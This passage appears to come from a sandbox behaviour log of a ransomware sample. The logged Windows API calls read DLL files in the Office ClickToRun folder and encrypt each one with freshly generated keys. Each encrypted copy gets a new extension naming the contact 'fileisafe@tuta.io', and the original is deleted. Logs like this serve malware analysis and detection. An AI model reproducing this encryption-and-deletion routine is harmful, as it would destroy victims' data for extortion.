returned 1 [0068.235] ReadFile (in: hFile=0x24c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4ac0, lpOverlapped=0x0) returned 1 [0068.495] CryptEncrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4ad0, dwBufLen=0x4ad0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4ad0) returned 1 [0068.495] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4ad0, lpOverlapped=0x0) returned 1 [0068.496] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71bc0) returned 1 [0068.496] CryptSetKeyParam (hKey=0xf71bc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.496] CryptEncrypt (in: hKey=0xf71bc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70, dwBufLen=0x70 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70) returned 1 [0068.496] CryptDestroyKey (hKey=0xf71bc0) returned 1 [0068.496] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x122, lpOverlapped=0x0) returned 1 [0068.496] CryptDestroyKey (hKey=0xf72080) returned 1 [0068.497] CloseHandle (hObject=0x24c) returned 1 [0068.497] CloseHandle (hObject=0x324) returned 1 [0068.498] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll")) returned 1 [0068.499] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.500] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=20672) returned 1 [0068.500] CloseHandle (hObject=0x324) returned 1 [0068.500] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll")) returned 0x20 [0068.500] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.500] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.500] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.501] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71cc0) returned 1 [0068.501] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.501] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x50c0, lpOverlapped=0x0) returned 1 [0068.502] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50d0, dwBufLen=0x50d0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50d0) returned 1 [0068.502] WriteFile (in: hFile=0x24c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x50d0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x50d0, lpOverlapped=0x0) returned 1 [0068.503] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e80) returned 1 [0068.503] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.503] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70, dwBufLen=0x70 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70) returned 1 [0068.503] CryptDestroyKey (hKey=0xf71e80) returned 1 [0068.503] WriteFile (in: hFile=0x24c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x122, lpOverlapped=0x0) returned 1 [0068.503] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0068.503] CloseHandle (hObject=0x324) returned 1 [0068.503] CloseHandle (hObject=0x24c) returned 1 [0068.504] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll")) returned 1 [0068.506] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.506] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.506] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=19648) returned 1 [0068.506] CloseHandle (hObject=0x24c) returned 1 [0068.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll")) returned 0x20 [0068.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.506] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.506] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.506] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.506] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.506] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ec0) returned 1 [0068.506] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.506] ReadFile (in: hFile=0x24c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4cc0, lpOverlapped=0x0) returned 1 [0068.508] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4cd0, dwBufLen=0x4cd0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4cd0) returned 1 [0068.508] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4cd0, lpOverlapped=0x0) returned 1 [0068.509] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71c40) returned 1 [0068.509] CryptSetKeyParam (hKey=0xf71c40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.509] CryptEncrypt (in: hKey=0xf71c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60, dwBufLen=0x60 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60) returned 1 [0068.509] CryptDestroyKey (hKey=0xf71c40) returned 1 [0068.509] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x112, lpOverlapped=0x0) returned 1 [0068.509] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0068.509] CloseHandle (hObject=0x24c) returned 1 [0068.509] CloseHandle (hObject=0x324) returned 1 [0068.510] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll")) returned 1 [0068.515] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.515] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.515] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=19136) returned 1 [0068.515] CloseHandle (hObject=0x324) returned 1 [0068.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll")) returned 0x20 [0068.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.515] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.515] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.515] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.515] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.516] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ec0) returned 1 [0068.516] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.516] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4ac0, lpOverlapped=0x0) returned 1 [0068.517] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4ad0, dwBufLen=0x4ad0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4ad0) returned 1 [0068.517] WriteFile (in: hFile=0x24c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4ad0, lpOverlapped=0x0) returned 1 [0068.518] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71f00) returned 1 [0068.518] CryptSetKeyParam (hKey=0xf71f00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.518] CryptEncrypt (in: hKey=0xf71f00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70, dwBufLen=0x70 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70) returned 1 [0068.518] CryptDestroyKey (hKey=0xf71f00) returned 1 [0068.518] WriteFile (in: hFile=0x24c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x122, lpOverlapped=0x0) returned 1 [0068.518] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0068.518] CloseHandle (hObject=0x324) returned 1 [0068.518] CloseHandle (hObject=0x24c) returned 1 [0068.519] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll")) returned 1 [0068.520] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.520] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.521] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=27840) returned 1 [0068.521] CloseHandle (hObject=0x24c) returned 1 [0068.521] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll")) returned 0x20 [0068.521] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.521] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.521] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.521] SetFilePointerEx (in: hFile=0x24c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.521] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.522] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72080) returned 1 [0068.522] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.522] ReadFile (in: hFile=0x24c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x6cc0, lpOverlapped=0x0) returned 1 [0068.523] CryptEncrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x6cd0, dwBufLen=0x6cd0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x6cd0) returned 1 [0068.523] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x6cd0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x6cd0, lpOverlapped=0x0) returned 1 [0068.524] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e00) returned 1 [0068.524] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.524] CryptEncrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60, dwBufLen=0x60 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x60) returned 1 [0068.524] CryptDestroyKey (hKey=0xf71e00) returned 1 [0068.524] WriteFile (in: hFile=0x324, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x112, lpOverlapped=0x0) returned 1 [0068.524] CryptDestroyKey (hKey=0xf72080) returned 1 [0068.525] CloseHandle (hObject=0x24c) returned 1 [0068.525] CloseHandle (hObject=0x324) returned 1 [0068.526] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll")) returned 1 [0068.527] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0068.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.527] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=26816) returned 1 [0068.527] CloseHandle (hObject=0x324) returned 1 [0068.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll")) returned 0x20 [0068.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0068.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0068.527] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.527] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0068.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0068.528] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b00) returned 1 [0068.528] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.528] ReadFile (in: hFile=0x324, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x68c0, lpOverlapped=0x0) returned 1 [0068.674] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x68d0, dwBufLen=0x68d0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x68d0) returned 1 [0068.674] WriteFile (in: hFile=0x24c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x68d0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x68d0, lpOverlapped=0x0) returned 1 [0068.675] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a00) returned 1 [0068.675] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0068.675] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70, dwBufLen=0x70 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70) returned 1 [0068.675] CryptDestroyKey (hKey=0xf71a00) returned 1 [0068.675] WriteFile (in: hFile=0x24c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x122, lpOverlapped=0x0) returned 1 [0068.675] CryptDestroyKey (hKey=0xf71b00) returned 1 [0068.675] CloseHandle (hObject=0x324) returned 1 [0068.676] CloseHandle 